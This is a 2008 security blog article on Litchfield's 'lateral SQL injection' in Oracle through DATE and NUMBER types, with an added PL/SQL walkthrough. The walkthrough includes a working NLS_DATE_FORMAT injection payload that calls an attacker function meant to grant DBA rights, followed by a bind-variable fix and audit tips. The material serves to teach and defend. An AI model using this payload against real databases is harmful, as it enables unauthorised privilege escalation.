New Oracle Hack

By Dan Morrill
Expert Author
Article Date: 2008-04-30

Never assume anything: with Oracle, you now can't trust even typed data.

SQL injections were all over the Internet last week, and security researcher David Litchfield has published a paper, "Lateral SQL Injection: A New Class of Vulnerability in Oracle", describing a new Oracle attack that works through the DATE and NUMBER data types. The paper came out on Thursday.
In a SQL injection, attackers create specially crafted search terms that trick the database into running SQL commands. Previously, security experts thought that SQL injections would work only if the attacker was inputting character strings into the database, but Litchfield has shown that the attack can work using new types of data, known as date and number data types. Source: Computer World
There is a sense of irony in databases and injection attacks being all the rage again. Databases have gone through wave after wave of exposure since the acoustic modem was invented and people simply didn't put passwords on anything at all. Since then we have seen attacks against database systems culminating in the SQL Slammer worm, and now we are very deep into subverting exposed calls and making those calls do neat and interesting things.

Until now Oracle had no injection variant of its own, which is what makes Litchfield's paper worth the read: the NUMBER and DATE types were previously assumed to be safe to concatenate into dynamic SQL, because they cannot hold a quote character. The catch is that when PL/SQL concatenates a DATE or NUMBER into a string, the implicit conversion uses the calling session's NLS settings (NLS_DATE_FORMAT, NLS_NUMERIC_CHARACTERS), and any connected user can change their own. A date format mask may contain arbitrary literal text in double quotes, so a low-privileged user can make every DATE render as attacker-chosen SQL, and a definer's-rights procedure that splices even SYSDATE into a statement will run it with the owner's privileges. No string input from the attacker is needed at all, hence "lateral". The question that should be working its way up through the ranks is this: if Oracle, which implements the same SQL standard as every other relational database, has this issue, is the same issue present in Microsoft SQL Server, IBM's DB2 and MySQL, along with the many smaller, less-used databases? The specific trick depends on session-controlled conversion formats, but the general lesson does not: anything concatenated into dynamic SQL is attacker-influenced input, whatever its declared type, and bind variables are the fix.
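The following PL/SQL is an added, constructed illustration of the DATE case from Litchfield's paper; it is not code from the article or from the paper itself. The schema names (orders, report_for_today, lowpriv.pwn_func) are hypothetical. The paper makes the same point for NUMBER via NLS_NUMERIC_CHARACTERS, with less room for a payload; the DATE case is the clearer one to show.

```sql
-- Added example (not from the article or Litchfield's paper); all object
-- names are hypothetical.

-- 1. Vulnerable definer's-rights procedure. It takes no caller input: the only
--    value it splices into the statement is SYSDATE, a DATE. The implicit
--    DATE -> VARCHAR2 conversion in the || expression uses the *caller's*
--    session NLS_DATE_FORMAT, not the owner's.
CREATE OR REPLACE PROCEDURE report_for_today
AUTHID DEFINER
AS
  v_sql   VARCHAR2(4000);
  v_today DATE := SYSDATE;
  v_cnt   NUMBER;
BEGIN
  v_sql := 'SELECT COUNT(*) FROM orders WHERE order_day = ''' || v_today || '''';
  DBMS_OUTPUT.PUT_LINE(v_sql);            -- show what is about to run
  EXECUTE IMMEDIATE v_sql INTO v_cnt;
END;
/

-- 2. Attacker session. Any connected user can change their own NLS settings.
--    Text in double quotes inside a date format model is emitted literally,
--    so after this every DATE converts to the string:  ' OR lowpriv.pwn_func()=1--
--    (the '' inside the SQL string literal is one escaped single quote).
--    The function is schema-qualified because name resolution happens in the
--    definer's schema; the attacker grants EXECUTE on it to PUBLIC beforehand.
ALTER SESSION SET NLS_DATE_FORMAT = '"'' OR lowpriv.pwn_func()=1--"';

-- Confirm what the "typed" value now looks like as text:
SELECT TO_CHAR(SYSDATE) AS rendered FROM dual;
-- rendered = ' OR lowpriv.pwn_func()=1--

-- The procedure now builds and runs, with its owner's privileges:
--   SELECT COUNT(*) FROM orders WHERE order_day = '' OR lowpriv.pwn_func()=1--'
-- The -- turns the closing quote into a comment, and pwn_func() is evaluated
-- for each candidate row of orders (e.g. a function that runs GRANT DBA via
-- EXECUTE IMMEDIATE). NLS_DATE_FORMAT is short, which is why the payload is
-- a call into attacker-owned code rather than the full statement.
EXEC report_for_today;

-- 3. Hardened version: the DATE never touches the SQL text. Bind it instead.
CREATE OR REPLACE PROCEDURE report_for_today_safe
AUTHID DEFINER
AS
  v_today DATE := SYSDATE;
  v_cnt   NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM orders WHERE order_day = :d'
    INTO v_cnt USING v_today;
  DBMS_OUTPUT.PUT_LINE(v_cnt);
END;
/
-- If a date really must be spliced in as text (DDL, for instance), convert it
-- explicitly with a fixed mask, TO_CHAR(v_today, 'YYYY-MM-DD'), so the
-- session's NLS_DATE_FORMAT plays no part in the result.
```

Auditing for this pattern means searching PL/SQL for `||` adjacent to DATE or NUMBER variables inside strings handed to EXECUTE IMMEDIATE or DBMS_SQL, not only for string parameters; the definer's-rights procedures owned by SYS or other privileged schemas are the ones that matter.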

Read the paper; it could prove significant over the longer run.

About the Author:
Dan Morrill has been in the information security field for 18 years, both civilian and military, and is currently working on his Doctor of Management. Dan shares his insights on the important security issues of today through his blog, Managing Intellectual Property & IT Security, and is an active participant in the ITtoolbox blogging community.